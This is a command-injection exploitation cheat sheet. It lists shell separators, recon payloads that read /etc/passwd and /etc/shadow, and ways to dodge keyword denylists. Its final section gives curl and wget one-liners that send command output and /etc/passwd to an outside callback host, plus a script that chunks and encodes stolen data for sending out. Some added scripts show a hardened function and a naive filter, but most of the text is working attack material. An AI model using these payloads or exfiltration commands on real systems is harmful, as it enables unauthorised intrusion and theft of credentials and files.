OS command execution exploitation techniques
Chain commands using various separators
Separator    Linux  Windows
; whoami     yes    PowerShell only (cmd.exe does not treat ; as a command separator)
| whoami     yes    yes
|| whoami    yes    yes  (runs only if the preceding command fails)
& whoami     yes    yes  (Linux: backgrounds the preceding command; cmd.exe: plain sequential separator)
&& whoami    yes    yes  (runs only if the preceding command succeeds)
`whoami`     yes    no   (inline substitution: the output becomes part of the original command's arguments)
$(whoami)    yes    PowerShell only
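The separators above only matter because some application hands the concatenated string to a shell. The script below is an added example, not code from the original page: `vuln_lookup` is a hypothetical vulnerable wrapper that re-parses its input through `sh -c`, `safe_lookup` is its hardened form (input passed as one quoted argument and restricted to hostname characters), and `injected` checks whether an injected `whoami` actually ran. Note the `|| whoami` row: because the preceding `printf` succeeds, the injected command never fires, which is exactly the failure a tester hits when the prefix command does not error out.

```sh
#!/bin/sh
# Simulated vulnerable endpoint (hypothetical application code, not from any
# real project): untrusted input is concatenated into a command string that is
# handed to a shell, so every metacharacter in the input is parsed as code.
vuln_lookup() {
    sh -c "printf 'host=%s\n' $1"
}

# Hardened form: the input is passed as a single argument, never re-parsed by a
# shell, and additionally restricted to hostname characters.
safe_lookup() {
    case "$1" in
        ''|*[!A-Za-z0-9.-]*) printf 'rejected\n'; return 1 ;;
    esac
    printf 'host=%s\n' "$1"
}

# Returns 0 when the injected whoami actually executed, i.e. the current user
# name shows up somewhere in the captured output of the vulnerable function.
injected() {
    out=$(vuln_lookup "$1" 2>/dev/null)
    case "$out" in
        *"$(whoami)"*) return 0 ;;
        *)             return 1 ;;
    esac
}

# Walk the separator list from the cheat sheet against the vulnerable function.
demo() {
    for p in '; whoami' '| whoami' '|| whoami' '& whoami' '&& whoami' \
             '`whoami`' '$(whoami)'; do
        if injected "$p"; then r=ran; else r=skipped; fi
        printf '%-12s -> %s\n' "$p" "$r"
    done
    safe_lookup '; whoami' || true   # prints "rejected": no shell ever sees the ;
}

demo
```

Run it as-is to see every separator except `||` report `ran`; swap `printf` for a command that fails on odd input to watch `||` become the working separator.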
Common Linux recon commands
Linux
; cat /etc/passwd
; id
; uname -a
; ls -la
; pwd
; cat /etc/shadow     (readable only when the injected command runs as root or a member of the shadow group)
Windows-specific command injection payloads
Windows
& whoami
& ipconfig
& type C:\Windows\win.ini
& dir C:\
& systeminfo
& net user
Techniques to bypass command injection filters
;w`echo ho`ami      (backtick substitution splitting the word; the common variant w`ho`ami runs the nonexistent command ho, substitutes nothing, and resolves to wami)
;who$()ami          (empty command substitution)
;who$@ami           (empty positional parameters; who$ami is wrong, since the unset variable $ami expands to nothing and the shell runs who)
;c''at /etc/passwd  (empty quotes inside the word are removed before execution)
;c""at /etc/passwd
;ca\t /etc/passwd   (a backslash before an ordinary character is dropped)
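The point of these payloads is that a denylist matching the literal strings `whoami` or `cat` sees none of them, while the target shell still executes the blocked command. The script below is an added example, not from the original page: `filter_blocks` is a hypothetical substring denylist standing in for an application filter, and `resolve` shows the command word the shell actually executes for a payload by letting `sh` parse it in the same way it would in the injected context but printing the result instead of running it. It also exposes the two broken variants, `who$ami` and w`ho`ami, which pass the filter but do not resolve to `whoami`.

```sh
#!/bin/sh
# Naive denylist standing in for a web application's input filter
# (hypothetical): rejects input that contains a blocked command word verbatim.
filter_blocks() {
    case "$1" in
        *whoami*|*cat*) return 0 ;;   # blocked
        *)              return 1 ;;   # allowed through
    esac
}

# Show the command word the target shell will actually execute for a payload:
# sh parses the payload exactly as it would in the injected command line, but
# printf prints the resulting word instead of executing it.
resolve() {
    sh -c "printf '%s\n' $1" 2>/dev/null | head -n 1
}

# Walk each payload: does the filter pass it, and what does the shell run?
demo() {
    for p in 'w`echo ho`ami' 'who$()ami' 'who$@ami' "c''at" 'c""at' 'ca\t' \
             'who$ami' 'w`ho`ami'; do
        if filter_blocks "$p"; then f=blocked; else f=passed; fi
        printf '%-14s filter=%-8s shell runs: %s\n' "$p" "$f" "$(resolve "$p")"
    done
}

demo
```

The last two rows print `who` and `wami`: they bypass the filter but lose the command, so test a bypass with `resolve` (or against an `echo` sink) before relying on it blind.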
Exfiltrate command output to external server
; curl "https://callback.l4ughingm4n.dev/?data=$(whoami)"
; wget -qO- "https://callback.l4ughingm4n.dev/?data=$(id|base64|tr -d '\n')"
; cat /etc/passwd | curl --data-binary @- https://callback.l4ughingm4n.dev/
Caveats: quote the URL so the shell does not glob ? or split on &. Standard base64 output contains +, / and = and is line-wrapped by most implementations, all of which corrupt or truncate a query-string value; strip the newlines and either URL-encode the result (curl -G --data-urlencode "data=$(id)") or switch to the URL-safe alphabet. curl -d @- strips newlines from the posted body, so use --data-binary @- when the file content must arrive intact.
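For output larger than a hostname the GET-based payloads above need two things the one-liners skip: an encoding that survives a URL, and chunking so a whole file fits within URL length limits. The script below is an added example, not from the original page; the helper names `url_b64`, `chunk_urls` and `url_b64_decode` are hypothetical, the sample `id` output is constructed, and nothing is sent (it prints the request URLs a payload would fire, one per chunk, against the page's callback host).

```sh
#!/bin/sh
# URL-safe base64 (RFC 4648 section 5) with padding stripped: standard base64
# emits '+', '/', '=' and a newline every 76 characters, all of which corrupt
# or truncate a query-string value. (Added helper, hypothetical name.)
url_b64() {
    base64 | tr -d '\n=' | tr '+/' '-_'
}

# Split an encoded blob into fixed-size chunks so that even a large file fits
# within typical URL length limits; each chunk carries its index so the
# receiver can reassemble in order.   $1 = callback base URL, $2 = chunk size
chunk_urls() {
    fold -w "$2" | awk -v base="$1" '{ printf "%s?i=%d&data=%s\n", base, NR, $0 }'
}

# Receiver side: restore the standard alphabet and padding, then decode.
url_b64_decode() {
    data=$(cat | tr '_-' '/+')
    while [ $(( ${#data} % 4 )) -ne 0 ]; do data="${data}="; done
    printf '%s' "$data" | base64 -d
}

# Constructed sample standing in for real `id` output; prints the URLs a
# chunked exfiltration payload would request, 32 encoded characters each.
exfil_demo() {
    printf 'uid=0(root) gid=0(root) groups=0(root)' \
        | url_b64 | chunk_urls 'https://callback.l4ughingm4n.dev/' 32
}

exfil_demo
```

On the receiving side, concatenate the `data` values in `i` order and pipe them through `url_b64_decode`; the encoder and decoder round-trip because padding is recomputed from the length rather than transmitted.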